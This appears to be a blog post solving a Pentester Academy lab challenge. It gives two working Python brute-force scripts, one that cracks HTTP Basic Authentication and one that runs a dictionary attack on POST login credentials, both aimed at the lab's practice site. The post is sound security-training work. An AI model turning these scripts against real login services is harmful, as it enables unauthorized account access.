Pentester Academy Challenge 4 via Python



Challenge 4 from Pentester Academy turned out to be nothing but a combination of two previous challenges. The login form expects POST credentials. But it also pops out a basic authentication login when the user enters the credentials. So let’s break this up into two parts:
1.       Cracking the password for Basic Authentication:
We know the response for Basic Authentication is a header the contains Base64 encoded username:password preceded by Basic:
Authorization: Basic YWRtaW46bXlwYXNz
So we will generate a list of all password combinations and bombard the server with them till we succeed. At the end we will have user/password combination for Basic Authentication. The code for this looks like:
import urllib2
import base64
import sys
def fun(a):
    chars="vie"
    l = len(a)
    lenthPerWord = len(a[0])
    if lenthPerWord == 5:
        return a
    c=[]
    for i in range(0,l):
        for j in chars:           
            c.append(j+a[i])
    return fun(c)
c=['v','i','e']
listOfPass=fun(c)

for user in ["admin","nick"]:
        for password in listOfPass:
        r=urllib2.Request("http://pentesteracademylab.appspot.com/lab/webapp/auth/form/1?email=foo&password=goo","")
        encoded=base64.encodestring(user+':'+password)[:-1]      
        r.add_header("Authorization","Basic "+encoded)
        try:
            handle=urllib2.urlopen(r)
            print user+":"+password
            sys.exit(1)
        except IOError, e:
            print str(e)+" for "+user+":"+password

2.       Cracking the POST credentials
By now we should have the Basic Authentication credentials. We will use the same username/password for very post request. The POST data containing the username and password will be set in real time based on the password list that we generate (dictionary attack).
Were we doing this through a browser rather than a Python script, the browser would remember the Basic Auth Credentials and send them for us silently every time.

Also remember when you send data in POST it should be URL Encoded. urlencode() functionof urllib module can be used to accomplish that. A python dictionary data type argument has to be provided to the function.

The complete code looks like this:
import urllib2
import urllib
import base64
import sys
def fun(a):
    chars="onm"
    l = len(a)
    lenthPerWord = len(a[0])
    if lenthPerWord == 5:
        return a
    c=[]
    for i in range(0,l):
        for j in chars:           
            c.append(j+a[i])
    return fun(c)
c=['m','n','o']
listOfPass=fun(c)

for user in ["admin","nick"]:
    for password in listOfPass:      
        data = {"email":user+"@PentesterAcademy.com","password":password}
        data = urllib.urlencode(data)
        r=urllib2.Request("http://pentesteracademylab.appspot.com/lab/webapp/auth/form/1",data)
        r.add_header("Authorization","Basic bmljazp2aXZ2dg==")       
        handle=urllib2.urlopen(r)      
        response = handle.read()
        handle.close()
        if not "Failed" in str(response):
            print "Succeeded for "+user+"@PentestAcademy.com"+":"+password           
            sys.exit(1)
        else:
            print "Failed for "+user+"@PentestAcademy.com"+":"+password

Soon enough the credentials for the form are also cracked.

Comments

Post a Comment

Popular posts from this blog

Disable Low and Medium Strength Cipher for Java Applications

I use SSL so I am secure, right? - Wrong A commonplace feeling is that if you are using TLS/SSL for communication between different components, the data in transit is safe. This is a misconception since the security of data in transit depends on what exact algorithms are being used for encryption. Some of the algorithms are deemed to be broken such as MD5 and RC4. During the negotiation between a client and a server when a TLS/SSL connection initiates, both the parties mutually decide which SSL version and cipher suite to go with for rest of the communication. SSL version 2 is considered to be unsafe while SSL v3 and TLS v1 are considerd safe. Cipher What? - Cipher Suite Cipher suites is a named combination of algorithms used for encryption when using TLS/SSL. It contains the encryption algorithm (like DES, RC4, AES) and the key size like (40, 56, 128 bit) and the hashing algorithm (like SHA and MD5). eg.  RSA_WITH_RC4_128_SHA.  Key size defines if the cipher is lo...
Read more

Pentester Academy Basic Authentication Challenge 3 via Python

Since I am learning python here is a try at solving a Basic Auth Brute Force challenge posted at Pentester Academy: http://pentesteracademylab.appspot.com/lab/webapp/basicauth The challenge is Basic in difficulty level and already provides the usernames: nick or admin. The password is of 5 letters and consists of only a , s and d . So the problem can be divided into two parts: 1. Creating all the password combinations Here is the recursive function that returns a list of all the 5 letter combinations of a , s and d : def fun(a):     chars="asd"     l = len(a)     lenthPerWord = len(a[0])     if lenthPerWord == 5:         return a     c=[]     for i in range(0,l):         for j in chars:                      ...
Read more

Pentester Academy GET Method Challenge 1 via Python

The Challenge 1 for Pentester Academy uses GET method for sending over the credentials. So the username and password go like: http://pentesteracademylab.appspot.com/lab/webapp/1?email=admin%40PentesterAcademy.com&password=zzzxx Also one big hint dropped here is that the domain is PentesterAcademy.com. So the email addresses would look like admin@PentesterAcademy.com and jack@PentesterAacademy.com . I reused the code for generating all combinations of x , y and z from my previous blog post aimed at challenge 3. We just need to update the URL with the username and the password while sending the request for each combination. But how do we verify if the credentials have been accepted as valid or rejected? The webpage says “ Failed! Please try again!” if the credentials are rejected. So we can search for the string “Failed” in the response to check if the credentials were accepted. The complete solutions looks as follows: import urllib2 import sys def fun(a)...
Read more